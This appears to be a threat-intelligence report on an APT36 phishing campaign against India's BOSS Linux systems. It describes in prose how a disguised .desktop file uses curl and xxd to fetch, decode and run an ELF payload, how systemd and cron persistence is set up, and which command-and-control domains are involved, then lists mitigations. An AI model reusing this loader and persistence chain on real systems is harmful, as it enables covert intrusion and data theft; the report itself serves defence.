In early August 2025, cybersecurity researchers identified a sophisticated campaign by the Pakistan-based Advanced Persistent Threat (APT) group, APT36, targeting India’s BOSS (Bharat Operating System Solutions) Linux systems. This operation employs weaponized .desktop shortcut files to infiltrate and compromise government infrastructure.
Initial Attack Vector
The attack begins with spear-phishing emails containing a ZIP archive named Meeting_Notice_Ltr_ID1543ops.pdf_.zip. Upon extraction, the archive reveals a file titled Meeting_Ltr_ID1543ops.pdf.desktop. This .desktop file, when executed, initiates a series of commands that download and deploy a malicious ELF (Executable and Linkable Format) payload specifically designed for x86-64 Linux systems.
Execution and Payload Deployment
The .desktop file’s execution line embeds a bash command that performs the following actions:
1. Creates a timestamped temporary file in the /tmp directory.
2. Uses the curl command to retrieve a hex-encoded payload from a remote server.
3. Converts the hex-encoded payload into a binary executable using the xxd utility.
4. Assigns execution permissions to the binary and launches it in the background.
To maintain the appearance of legitimacy, the script simultaneously opens a benign PDF document hosted on Google Drive in the Firefox browser, thereby diverting the user’s attention from the malicious activities occurring in the background.
Persistence Mechanisms
Once the ELF payload is executed, it establishes persistence on the infected system through multiple methods:
– Systemd Service: The malware installs a user-level systemd service named system-update.service, ensuring that the malicious binary is executed during system startup.
– Cron Job: A cron job is created to execute the malicious binary located at `.config/systemd/systemd-update` upon system reboot.
These persistence techniques allow the malware to maintain control over the compromised system without requiring further user interaction.
Command and Control Communication
The malware communicates with its command-and-control (C2) servers using obfuscated DNS queries over nonstandard ports. The primary C2 server identified is modgovindia.space:4000. This communication method facilitates both the retrieval of commands from the attackers and the exfiltration of sensitive data from the infected systems.
Malicious Infrastructure
The domains securestore.cv and modgovindia.space were registered in July 2025 and have been flagged as part of the malicious infrastructure supporting this campaign. The rapid deployment of these domains, coupled with the tailored payloads, underscores APT36’s evolving sophistication and strategic focus on India’s public sector.
Technical Analysis of the ELF Payload
A deeper examination of the ELF payload reveals several noteworthy characteristics:
– ELF Header: The payload is a statically linked 64-bit LSB executable. Anomalous section headers are present, likely intended to hinder static analysis by security researchers.
– Execution Flow: After conversion from its hex-encoded form and execution, the payload installs the aforementioned persistence mechanisms. It then establishes nonblocking UDP sockets and utilizes the epoll system call for efficient I/O operations, facilitating its DNS-based C2 communications.
Implications and Recommendations
This campaign highlights APT36’s advanced tradecraft and their ability to adapt to different operating environments, including Linux systems. The use of .desktop files as an attack vector is particularly concerning, as it exploits the trust users place in seemingly benign shortcut files.
To mitigate the risks associated with such attacks, organizations, especially those within the government sector, should consider implementing the following measures:
1. Enhanced Email Security: Deploy advanced email filtering solutions capable of detecting and blocking spear-phishing attempts that contain malicious attachments or links.
2. Application Whitelisting: Implement application whitelisting to prevent the execution of unauthorized or unknown applications, including potentially malicious .desktop files.
3. Endpoint Monitoring: Utilize endpoint detection and response (EDR) solutions to monitor for suspicious activities, such as the creation of unexpected systemd services or cron jobs.
4. User Education: Conduct regular training sessions to educate users about the dangers of phishing attacks and the importance of verifying the authenticity of email attachments and links before interacting with them.
By adopting these proactive measures, organizations can enhance their resilience against sophisticated cyber threats like those posed by APT36.
